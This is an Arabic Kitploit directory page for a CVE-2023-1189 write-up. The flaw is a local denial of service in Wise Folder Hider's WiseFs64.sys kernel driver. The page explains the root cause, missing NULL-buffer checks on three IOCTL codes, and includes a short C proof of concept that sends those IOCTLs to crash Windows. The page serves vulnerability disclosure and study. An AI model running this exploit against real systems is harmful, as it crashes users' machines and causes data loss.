Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-1189 — CVE-2023-1189 PoC و Exploit | Kitploit
أدوات/GitHubGitHub/le0s1mba/cve-2023-1189
تحليل الثغرات الأمنيةالاستغلالاستغلال الملفات الثنائية
GitHuble0s1mba/cve-2023-1189

CVE-2023-1189

CVE-2023-1189 PoC و Exploit

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-1189

1. ملخص

العنصرالتفاصيل
CVE IDCVE-2023-1189
نوع الثغرةإغلاق غير صحيح للموارد أو تحريرها (CWE-404)
البرنامج المتأثرWiseCleaner Wise Folder Hider
المكون المعرضWiseFs64.sys (مشغل النواة)
إصدار الثغرة4.4.3.202
CVSSNVD - 5.5 (متوسط), VulDB - 3.3 (منخفض)
تاريخ الكشف2023.03.06

هذه الثغرة هي ثغرة رفض خدمة محلية (Local Denial of Service) تسمح للمهاجم، بصلاحيات مستخدم، بإحداث إلغاء مرجعية لمؤشر فارغ (NULL Pointer Dereference) في النواة عبر IOCTL معين، مما يؤدي إلى تعطل النظام (BSOD).

2. السبب الجذري

تحدث ثغرة CVE-2023-1189 في مشغل النواة WiseFs64.sys الذي ينشئه برنامج Wise Folder Hider الإصدار 4.4.3.202 أثناء التثبيت.

بشكل عام، تدفق الثغرة كما يلي:

image.png

إذا نظرنا إلى هذا التدفق بالتفصيل:

DriverEntry func

أولاً، في دالة DriverEntry، يتم تعيين الدالة dispatchDeviceControl في الفهرس 14 من جدول التوزيع (Dispatch Table).

وبهذا، يتم تمرير جميع أوامر IOCTL القادمة إلى \\.\WiseFs إلى dispatchDeviceControl.

dispatchDeviceControl func

عند الدخول إلى دالة dispatchDeviceControl، يتم أولاً التحقق مما إذا كان الجهاز هو جهاز تحكم (Control Device)، وإذا كان كذلك، فسيتم الانتقال إلى دالة handleControlDeviceIoctl.

handleControlDeviceIoctl func

تحتوي دالة handleControlDeviceIoctl على المنطق الذي يعالج رموز IOCTL الفعلية.

من بين العديد من رموز IOCTL، تم حذف التحقق من قيمة المخزن المؤقت (Buffer) سواء كانت NULL أم لا في الرموز 0x222400 و 0x222404 و 0x222410.

لذلك، عند استدعاء هذه IOCTL والمخزن المؤقت NULL، سيصل المشغل إلى المخزن المؤقت مما يتسبب في إلغاء مرجعية مؤشر فارغ (NULL Pointer Dereference) ويؤدي إلى شاشة الموت الزرقاء (BSOD).

3. إثبات المفهوم والاستغلال

root@kitploit:~
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>

#define SymLinkName L"\\\\.\\WiseFS"

HANDLE hDevice;

int main(int argc, char* argv[]) {
	DWORD dwWrite = 0;

	hDevice = CreateFileW(SymLinkName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hDevice == INVALID_HANDLE_VALUE) {
		printf("failed to CreateFile\n");
		return 1;
	}

	// case 0x222400
	// DeviceIoControl(hDevice, 0x222400, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222404
	// DeviceIoControl(hDevice, 0x222404, NULL, 0, NULL, 0, &dwWrite, NULL);

	// case 0x222410
	// DeviceIoControl(hDevice, 0x222410, NULL, 0, NULL, 0, &dwWrite, NULL);
	
    CloseHandle(hDevice);
    return 0;
}

4. المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2023-1189
  • https://www.cve.org/CVERecord?id=CVE-2023-1189
  • https://cwe.mitre.org/data/definitions/404.html
  • https://github.com/zeze-zeze/WindowsKernelVuln/tree/master/CVE-2023-1189
تنزيل الأداة